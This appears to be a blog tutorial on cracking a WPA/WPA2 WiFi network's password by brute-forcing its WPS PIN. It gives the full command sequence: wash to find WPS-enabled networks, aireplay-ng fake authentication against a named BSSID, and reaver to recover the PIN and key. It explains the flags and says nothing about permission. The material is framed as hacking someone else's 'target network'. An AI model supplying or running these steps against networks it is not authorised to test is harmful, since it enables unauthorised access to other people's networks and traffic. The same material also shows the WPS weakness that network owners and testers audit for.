How to Hack WiFi WPA / WPA2 using WPS Feature

WPS represents WiFi protected setup. WPS makes a connection between wireless devices and router quicker and simpler. WPS works with WPA / WPA2 encryption. It allows the clients to connect to the network without the password. In WPS, authentication is done using 8 digits pin which is very small. WPS pin can be used to find the actual password / key of the wireless network.

Steps to Hack WiFi Network using WPS Feature

  1. Enable Monitor Mode of Wireless Interface Card

  2. Find the networks that has WPS feature enabled

    wash --interface wlan1
    Wash Command
    List of Wireless Networks having WPS Feature Enabled

    where wash is a software, which display all the networks which has WPS feature enabled and wlan1 is the wireless adapter in monitor mode.

    • ESSID is the target network, which i am going to hack
    • Vendor is the name of the hardware used in this network
    • Lck telling us that whether WPS is locked or not. If Lck is locked then WiFi cannot be hacked using WPS
    • WPS shows the version of WPS
    • dBm is the signal strength
    • CH is the channel on which the network is working on
    • BSSID is the MAC address of the target network

  3. Associate with the target network using the Fake Authentication Attack. I am telling the router that i want to communicate with you, so don’t reject my requests.
    aireplay-ng --fakeauth 100 -a E4:6F:13:66:E7:C0 -h 00:C0:CA:98:29:F3 wlan1 
  4. Use reaver, which will brute force WPS PIN and WPS PIN will be able to find the password of target network
    reaver --bssid E4:6F:13:66:E7:C0 --channel 1 --interface wlan1 --no-associate -vvv
    Reaver Command


    • –bssid E4:6F:13:66:E7:C0 is the MAC address of my target network
    • –channel 1 is the channel of target network
    • –interface wlan1 is wireless interface card in monitor mode
    • -vvv shows different messages, which tells us that whats going on during brute forcing. If there is any problem, we can fix the problem by reading those messages
    • –no-associate tells the reaver, don’t associate with the target network. I will do it manually
    WPA Password Cracked using WPS Feature

    So, revaer successfully find WPS PIN and WPA password key.

Note:This method only works if the router is configured with normal PIN authentication not with the Push Button Authentication. If Push Button Authentication is used then router will reject any PIN which we are trying to brute force.

Leave a Reply

Your email address will not be published. Required fields are marked *